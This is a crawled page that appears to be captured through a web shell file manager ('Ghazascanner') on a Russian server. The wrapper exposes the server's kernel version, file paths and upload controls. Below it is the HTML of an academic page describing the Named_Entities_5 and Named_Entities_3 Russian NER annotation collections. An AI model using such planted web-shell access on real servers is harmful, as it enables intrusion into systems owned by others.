@Ghazascanner
_2019runbot
Ghazascanner File Manager
server :Linux www.thesweb.ru 4.19.0-22-amd64 #1 SMP Debian 4.19.260-1 (2022-09-29) x86_64
Current Path :
/
var
/
www
/
www-root
/
data
/
www
/
new.labinform.ru
/
pub
/
named_entities
/
Path :
Upload File :
New :
File
Dir
/var/www/www-root/data/www/new.labinform.ru/pub/named_entities/index.htm
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link href="main.css" rel="stylesheet" type="text/css"> <title>Размеченные коллекции для извлечения именованных сущностей</title> <meta name="description" content="Общая информация о разметке коллекций"> <meta name="keywords" content="именованные сущности, named entity recognition"> </head> <body> <table class="top-table"> <tbody> <tr> <td><a href="http://www.labinform.ru">LABINFORM.RU</a></td> </tr> </tbody> </table> <h2> РАЗМЕЧЕННЫЕ КОЛЛЕКЦИИ ДЛЯ ИЗВЛЕЧЕНИЯ ИМЕНОВАННЫХ СУЩНОСТЕЙ </h2> <h4> Коллекция Named_Entities_5</h4> <p> Размеченная коллекция <b>Named_Entities_5</b> создана для оценки качества алгоритмов автоматического извлечения именованных сущностей из текстов на русском языке. В качестве основы для разметки этих коллекций взята коллекция <a href="http://ai-center.botik.ru/Airec/index.php/ru/collections/28-persons-1000">Persons-1000</a>, подготовленная Исследовательским центром Искусственного интеллекта Института программных систем РАН. </p> <p> В коллекции Persons-1000 были размечены упоминания имен персон в текстах, а также было приведено каноническое названия упомянутых персон. Особенностью этой разметки было то, что размечались только собственные имена персон, в разметку не включались, в частностью упоминания ролей персон (президент, отец) считаются реляционным типом информации. </p> <p> В коллекции Named_Entities_5 разметка имен людей из коллекции Persons-1000 была дополнена следующими типами имен: </p> <ul> <li>организации (Org) <li>источники информации - средства массовой информации, организации, имеющие функцию информирования (MEDIA) <li>места (Loc) <li>государства (Geopolit), страны и столицы, выступающие в роли правительства <br>(например, «Москва анонсировала») </ul> <p> Особенностью новой разметки является то, что в подавляющем числе случаев размеченное имя должно начинаться с заглавной буквы. Важными принципами разметки являются следующие: </p> <ul> <li>в разметке нет вложенных именованных сущностей, <li>именованные сущности не могут пересекаться, <li>каждому токену соответствует не более одного класса разметки. </ul> <p>Конкретные случаи </p> <ol> <li> Имя внутри названия организации не размечается отдельно: <p><pre>[Библиотека имени В.И. Ленина] - org</pre> </p> </li> <li> Вложенные организации и место, к которому они относятся размечаются отдельно. Это упрощенный подход к разметке организаций, но он позволяет делать разметку с высокой степенью согласия между разметчиками <p><pre>Общественный совет Правительства Москвы</pre></p> <p><pre>[Общественный совет] - Org</pre></p> <p><pre>Правительства - Org</pre></p> <p><pre>Москвы - Loc</pre></p> </li> <li> Имена мест, людей, организаций в кавычках размечаются в соответствии с тем, что значит это имя в кавычках: <p><pre>Гостиница "Москва" - Org</pre></p> </li> </ol> <p> Разметка производилась одним экспертом с помощью инструмента <a href="http://brat.nlplab.org/">Brat</a>. Затем на этой разметке была обучена система извлечения именованных сущностей с использованием кросс-валидации. Автоматическая разметка тестовой части сравнивалась с ручной разметкой и выявлялись случаи, когда система разметила правильно, а эксперт ошибся (пропустил, спутал тип сущности, неточно установил границы сущности). В случае обнаружения неточности экспертной разметки, в разметку вносилась правка. </p> <table width="40%"> <tr><td width="10%"> </td> <td width="30%" align="left">Число размеченных объектов в коллекции:</td><td align="right"> </td></tr> <tr><td width="10%"> </td><td width="30%" align="left">Типы сущностей</td><td align="right">Количество<br></td></tr><br> <tr><td width="10%"> </td><td width="30%">Pers</td><td align="right">10623<br></td></tr> <tr><td width="10%"> </td><td width="30%">Org</td><td align="right"> 7032<br></td></tr> <tr><td width="10%"> </td><td width="30%">Media</td><td align="right"> 1509<br></td></tr> <tr><td width="10%"> </td><td width="30%">Loc</td><td align="right"> 3141<br></td></tr> <tr><td width="10%"> </td><td width="30%">Geopolit</td><td align="right"> 4103<br></td></tr> </table> <h4> Коллекция Named_Entities_3</h4> <p> Также сделан вариант разметки именованных сущностей по трем классам <b>Named_Entities_3</b>: <ul> <li>имена людей,</li> <li>имена организаций, </li> <li>географические названия, </li> </ul> в которой названия государств присоединены к локациям, а имена медиа-организаций - к организациям. </p> <p><b>Скачать коллекции</b></p> <ul> <li> <a href="http://www.labinform.ru/pub/named_entities/collection5.zip">Named_Entities_5</a><br> </li> <li> <a href="http://www.labinform.ru/pub/named_entities/collection3.zip">Named_Entities_3</a><br> </li> </ul> <h4>Для библиографических ссылок</h4> <ol> <li> Mozharova V., Loukachevitch N., Two-stage approach in Russian named entity recognition // International FRUCT Conference on Intelligence, Social Media and Web, ISMW FRUCT 2016. Saint-Petersburg; Russian Federation, DOI 10.1109/FRUCT.2016.7584769 (<a href="http://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=7584769">PDF</a>)</li> <li> Можарова В.А., Лукашевич Н.В. Двухэтапный подход к извлечению именованных сущностей // Труды конференции по искусственному интеллекту КИИ-2016, т.2., 2016. - С.81-88. (<a href="https://istina.msu.ru/media/publications/article/911/121/30039499/mozharova.pdf">PDF</a>)</li> </ol> <h4>Благодарности</h4> <p>Коллекция создана при поддержке <a href="http://www.rfbr.ru">РФФИ</a> (проект № 15-07-09306) </p> </body> </html>